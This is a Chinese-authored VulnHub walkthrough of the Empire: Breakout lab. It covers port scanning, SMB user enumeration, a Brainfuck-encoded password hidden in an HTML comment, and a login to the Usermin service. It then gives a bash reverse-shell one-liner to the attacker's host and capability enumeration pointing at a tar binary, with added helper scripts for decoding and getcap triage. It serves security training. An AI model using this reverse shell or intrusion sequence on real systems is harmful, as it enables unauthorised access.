
breakout

洪琦
2023-12-01


Target information

Empire: Breakout ~ VulnHub

  • Filename: 02-Breakout.zip
  • File size: 1013 MB
  • MD5: C87BC1DB9BD51205B1E9EA441F8222AB
  • SHA1: 164DF36D136E5DA83FCCCF503D36A59B0D26E14A

Information gathering phase

1. Find the target with netdiscover

Running netdiscover -i eth0 identified the target at 192.168.86.138.

2. Information gathering with nmap
nmap -Pn -sS --stats-every 3m --max-retries 1  --defeat-rst-ratelimit -T4 -p1-65535 -oN /home/kali/2.txt  192.168.86.138

Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 21:57 EDT
Nmap scan report for localhost (192.168.86.138)
Host is up (0.0016s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp
MAC Address: 00:0C:29:14:59:73 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

The full-range scan shows ports 80, 139, 445, 10000 and 20000 open on 192.168.86.138, so we run version detection against just those ports:

nmap -sV -p 80,139,445,10000,20000 192.168.86.138
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 22:15 EDT
Nmap scan report for 192.168.86.138
Host is up (0.00034s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:14:59:73 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds

Then scan for vulnerabilities with the NSE vuln scripts:

nmap -A -p80,139,445,10000,20000 --script=vuln 192.168.86.138

It reports a pile of potential issues, most of them judged from version banners alone, so treat them as leads to verify rather than confirmed vulnerabilities. None of them is the intended path for this box, so we move on.

3. Information gathering on port 80

From the scan we know port 80 runs Apache httpd 2.4.51 (Debian).
Browsing to port 80 shows:

[screenshot: the page served on port 80]

Next, inspect the page source (this usually only pays off on CTF boxes).

It contains a clue left behind in an HTML comment:
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

The "encrypted" blob is actually a Brainfuck program; run it through an interpreter, for example

Brainfuck Language - Online Decoder, Translator, Interpreter (dcode.fr)

which yields the following string (most likely a password):

.2uqPEfj3D<P'a-3
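
As an added example (not code from the original write-up), here is a small Brainfuck interpreter with an HTML-comment scraper, so a clue like this can be decoded offline instead of pasting a credential recovered from a target into a third-party web decoder. The page fragment it runs on is constructed here from the comment shown above; the function and constant names are my own.

```python
# Added example, not part of the original write-up: a minimal Brainfuck
# interpreter plus an HTML-comment scraper for decoding clues offline.
import re
from typing import Dict, List

# The program exactly as it appears in the HTML comment on the Breakout index page.
BREAKOUT_CLUE = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++."

# Constructed page fragment reproducing the comment found on port 80 (assumed layout).
SAMPLE_PAGE = """<html><body>
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

""" + BREAKOUT_CLUE + """

-->
</body></html>"""

OPS = set("+-<>[].,")


def _match_brackets(code: str) -> Dict[int, int]:
    """Pre-compute matching [ ] offsets; reject unbalanced programs up front."""
    stack: List[int] = []
    pairs: Dict[int, int] = {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return pairs


def run_brainfuck(code: str, stdin: bytes = b"", tape_size: int = 30000,
                  max_steps: int = 1_000_000) -> str:
    """Run a Brainfuck program and return its output as text (Latin-1).

    Cells are 8-bit and wrap around. Moving the pointer off the tape is an
    error, and a step budget stops a looping program from hanging the caller:
    a blob lifted from a target is untrusted input and should not run unbounded.
    """
    jumps = _match_brackets(code)
    tape = bytearray(tape_size)
    out = bytearray()
    ptr = pc = steps = in_pos = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step budget exceeded")
        op = code[pc]
        if op == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("pointer ran off the end of the tape")
        elif op == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("pointer ran off the start of the tape")
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = stdin[in_pos] if in_pos < len(stdin) else 0  # EOF reads as 0
            in_pos += 1
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '['
        # any other character is a comment and is ignored
        pc += 1
    return out.decode("latin-1")


def find_brainfuck_in_html(html: str) -> List[str]:
    """Return every line inside an HTML comment that consists solely of
    Brainfuck operators (the shape of the clue on Breakout's index page)."""
    programs = []
    for comment in re.findall(r"<!--(.*?)-->", html, flags=re.S):
        for line in comment.splitlines():
            line = line.strip()
            if line and set(line) <= OPS:
                programs.append(line)
    return programs


def decode_page_clues(html: str) -> List[str]:
    """Decode every Brainfuck clue found in the page's HTML comments."""
    return [run_brainfuck(p) for p in find_brainfuck_in_html(html)]


if __name__ == "__main__":
    for secret in decode_page_clues(SAMPLE_PAGE):
        print(secret)
```

Feed it the saved index page (curl -s http://192.168.86.138/ > index.html, then decode_page_clues(open("index.html").read())) and it prints the same string the web decoder gave; the step budget and bracket check matter because the input came from a box you do not control.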

Use dirsearch for directory discovery on port 80:

dirsearch -u http://192.168.86.138:80

It found one path that exposes the Apache version information, but nothing vulnerable there.

A search with

searchsploit apache

turned up no usable exploit either.

Information gathering with enum4linux:
enum4linux 192.168.86.138

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.86.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Users on 192.168.86.138 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
# a username appears here
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''


It lists a lot of information; for now I only pull out the Samba version and the usernames,
which can be checked against searchsploit.

With what we have collected, we turn to the services on ports 10000 and 20000.

Logging in as cyber with the decoded string works on the application on port 20000 (Usermin, as the .usermin directory in the user's home shows later).

[screenshot: the port 20000 interface after logging in as cyber]

After logging in we have an unprivileged session as cyber with command execution, so pop a reverse shell back to the attacker box (192.168.86.132), which is listening with nc -lvnp 4444:

bash -i >& /dev/tcp/192.168.86.132/4444 0>&1

The >& redirect is what ties stdout and stderr to the socket (0>&1 does the same for stdin); without it bash would try to execute the /dev/tcp path as a script and never connect back.

With the low-privilege shell, gather information for privilege escalation. First, setuid binaries:

find / -type f -perm -u=s 2>/dev/null
# every regular file under / with the setuid bit set; 2>/dev/null discards the "Permission denied" noise from directories we cannot read

Next, list the home directory with ls -all:

cyber@breakout:~$ ls -all
ls -all
total 572
drwxr-xr-x  8 cyber cyber   4096 Oct 20  2021 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-------  1 cyber cyber    118 Mar 20 13:33 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20  2021 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt

Capability check. File capabilities are a privilege-escalation vector alongside setuid bits: cap_dac_read_search lets a binary bypass file read and directory search permission checks, so a root-owned copy of tar in the user's home directory carrying it deserves a close look.
cyber@breakout:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
cyber@breakout:~$
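
As an added example (not from the original write-up), the following script triages getcap -r / output the way a post-exploitation checklist would: it parses both libcap output styles, flags capabilities that bypass DAC or change identity, and flags capability-bearing binaries that live outside the usual system directories. The sample input is the getcap output pasted from above, prompt lines included; the capability descriptions and the DANGEROUS_CAPS and SYSTEM_DIRS lists are my own choices, not anything from the page.

```python
# Added example, not part of the original write-up: triage of `getcap -r /`
# output. Flags DAC-bypass / identity-changing capabilities and capability-
# bearing binaries outside the system directories.
import re
from typing import List, NamedTuple, Tuple

# The getcap output as pasted in the write-up, prompt lines included.
SAMPLE_GETCAP = """cyber@breakout:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
cyber@breakout:~$
"""

# Capabilities that by themselves hand a local user arbitrary file access or root
# (my selection; see capabilities(7) for the full semantics).
DANGEROUS_CAPS = {
    "cap_dac_read_search": "bypasses file read and directory search permission checks (read any file)",
    "cap_dac_override": "bypasses file read, write and execute permission checks",
    "cap_setuid": "can change the process UID, e.g. to 0",
    "cap_setgid": "can change the process GID",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses owner checks on chmod, utime and similar operations",
    "cap_sys_admin": "broad admin rights including mount",
    "cap_sys_ptrace": "can ptrace processes of other users",
    "cap_sys_module": "can load kernel modules",
}

# Binaries with capabilities normally live here; anything else deserves a look.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

# Both libcap output styles:  "/path cap_a,cap_b=ep"  and  "/path = cap_a,cap_b+ep"
LINE_RE = re.compile(r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<spec>[a-z0-9_,]+[=+][eip]+)$")


class Finding(NamedTuple):
    path: str
    caps: str
    flags: str
    reasons: List[str]


def parse_getcap(output: str) -> List[Tuple[str, List[str], str]]:
    """Turn raw getcap output into (path, [cap names], flag letters) rows,
    silently skipping prompts, echoed commands and anything else that isn't a row."""
    rows = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        names, flags = re.split(r"[=+]", m.group("spec"), maxsplit=1)
        rows.append((m.group("path"), names.split(","), flags))
    return rows


def triage(output: str) -> List[Finding]:
    """Return only the rows worth a closer look, each with the reasons why."""
    findings = []
    for path, caps, flags in parse_getcap(output):
        reasons = [f"{c}: {DANGEROUS_CAPS[c]}" for c in caps if c in DANGEROUS_CAPS]
        if not path.startswith(SYSTEM_DIRS):
            reasons.append("binary lives outside the system directories; check its owner and whether it is a renamed stock tool")
        # 'e' = effective: the capability applies as soon as the binary runs.
        # Without it the program must raise the capability itself, which stock tools never do.
        if reasons and "e" not in flags:
            reasons.append("capability is permitted but not effective; the program must raise it itself before it applies")
        if reasons:
            findings.append(Finding(path, ",".join(caps), flags, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_GETCAP):
        print(f"{f.path} ({f.caps}={f.flags})")
        for r in f.reasons:
            print("   -", r)
```

On the pasted output it reports only /home/cyber/tar, with two reasons: the capability itself, and the fact that the binary sits in a home directory rather than under /usr/bin. /usr/bin/ping with cap_net_raw is the normal Debian configuration and is left alone.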
